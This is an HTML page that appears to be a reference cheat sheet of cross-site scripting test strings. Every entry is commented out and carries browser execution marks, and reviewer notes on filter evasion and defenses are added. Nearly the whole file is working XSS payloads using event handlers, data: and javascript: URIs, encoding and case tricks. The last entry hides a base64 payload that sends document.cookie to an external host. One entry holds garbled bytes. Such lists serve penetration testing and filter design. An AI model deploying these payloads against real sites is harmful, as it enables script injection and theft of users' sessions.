<html>
<head><title>XSS-Payloads</title>
<body>
<!--
Some XSS-Payloads

Reference list of cross-site scripting (XSS) test strings. Every entry below is
wrapped in an HTML comment, so as committed this page renders nothing and runs
no script.

Layout: an annotation line such as "Firefox (+)/ Chrome (+)" is followed by the
test string(s) it applies to.
NOTE(review): (+) / (-) presumably mean the string did / did not execute in that
browser. The file records no browser versions and no test date, so treat the
marks as historical and re-verify them before relying on them.

For defenders: the entries vary letter case, whitespace, quoting, the
event-handler attribute used, the URL scheme (data:, javascript:) and the
encoding, rather than relying on one tag. Filters that blocklist tag or
attribute names therefore miss variants; context-aware output encoding, an
allowlist-based HTML sanitizer and a Content-Security-Policy that disallows
inline script are the controls that do not depend on enumerating them.
-->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <svg/onload=alert(1)> -->
<!-- Firefox (+)/ Chrome (+)-->
<!--<a onmouseover=alert(1)>x</a> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <div onmouseover='alert(1)'>DIV</div> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <IMAGE/onerror=alert(String.fromCharCode(88,83,83)) src=x> -->
<!-- Firefox (-)/ Chrome (+)-->
<!-- <IMAGE/onerror=alert(String.fromCharCode(88,83,83)) src=> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <IMG SRC=# onerror=alert(1)> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <IMG SRC=/ onerror=alert(String.fromCharCode(88,83,83))></img> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <img src=x onerror="javascript:alert('XSS')"> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <ImG sRc = / onerrOr = alert(1)> -->
<!-- <iMaGE sRc = / onerrOr = alert(1)> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <<SvG onloaD= alert(1)//>> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <svg/onmouseover=window.location=`http://google.de` width=1600 height=1600> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <IMG/SRC=#	 onerror=alert(1);	> -->
<!-- Firefox (+)/ Chrome (+)-->
<!-- <<SCRIPT>alert("XSS");//<</SCRIPT> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <BODY ONLOAD=alert(1)> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <IFRAME SRC=# onmouseover=alert(1)></IFRAME> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> -->
<!-- Firefox (+)/ Chrome (-) -->
<!-- <IFRAME SRC=# onerror=alert(1)></IFRAME> -->
<!-- Firefox (-)/ Chrome (+) -->
<!-- <IFRAME SRC=# onload=alert(1)></IFRAME> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="alert(1)"> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <var style="position:absolute;top:0;left:0;width:100%;height:100%" onmousemove=alert(1)></var> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <script src="data:text/javascript,alert(1)"></script> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <iframe/src \/\/onload = alert(1) -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- http://www.<script>alert(1)</script .com -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <a style="position:absolute;width:100%;height:100%" onmousemove="this.click();" href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <svg><script>//
alert(1);</script </svg> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <script x> alert(1) </script 1=2 -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+></object> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <audio src=1 href=1 onerror="alert(1)"></audio> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <audio src=1 onerror=alert(1)></audio> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <video src=1 onerror=alert(1)></video> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <video/src ='1'onerror=alert(1)> -->
<!-- Firefox (+)/ Chrome (-) -->
<!-- <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <video><source onerror="alert(1)"> -->
<!-- <video><source onerror=alert(1)> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <form><button style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover=this.click() formaction=javascript:alert(1)>x -->
<!-- NOTE(review): the href value in the next entry contains mis-encoded bytes (they appear as replacement characters); the original characters cannot be recovered from this file. -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <a style="position:absolute;width:100%;height:100%" onmousemove="this.click();"  href=[�]"� onmouseover=alert(1)//">XYZ</a -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <plaintext style=position:absolute;width:100%;height:100% onmouseover=alert(1) -->
<!-- Firefox (+)/ Chrome (-) -->
<!-- <object data=javascript:alert(1)> -->
<!-- NOTE(review): the isindex element used in some of the remaining entries is obsolete in the HTML standard; current browsers likely no longer treat it as a form control, so the marks on those entries need re-verification. -->
<!-- Firefox (+)/ Chrome (-) -->
<!-- <isindex type=image src=# onerror=alert(1)> -->
<!-- Firefox (+)/ Chrome (-) -->
<!-- <isindex style=position:absolute;top:0;left:0;width:100%;height:100% onmouseover=this.click() action=javascript:alert(1) type=image> -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <img src=x:window.location=alt onerror=eval(src) alt=http://google.de> -->
<!-- NOTE(review): the entry after the next annotation has no closing comment delimiter of its own. Its comment runs on to the end of the annotation line that follows it, so that annotation is absorbed into the same comment. Nothing becomes live markup, but the file is easy to break when editing here. -->
<!-- Firefox (+)/ Chrome (+) -->
<!-- <a style=position:absolute;width:100%;height:100% onmouseover=alert(1)>x</
<!-- Firefox (+)/ Chrome (+) -->
<!-- NOTE(review): unlike the alert(1) entries, the id attribute of the final entry is base64 that its onfocus handler decodes and passes to eval. Decoded, it assigns window.location to an external URL with document.cookie appended, i.e. a cookie-exfiltration pattern. Cookies flagged HttpOnly are not readable through document.cookie. -->
<!-- <isindex id=d2luZG93LmxvY2F0aW9uPSdodHRwOi8vZnNvYzFldHkuZXN5LmVzL2luZGV4LnBocC8nK2RvY3VtZW50LmNvb2tpZQoK type=image autofocus onfocus=eval(atob(unescape(this.id)))> -->
</body>
</html>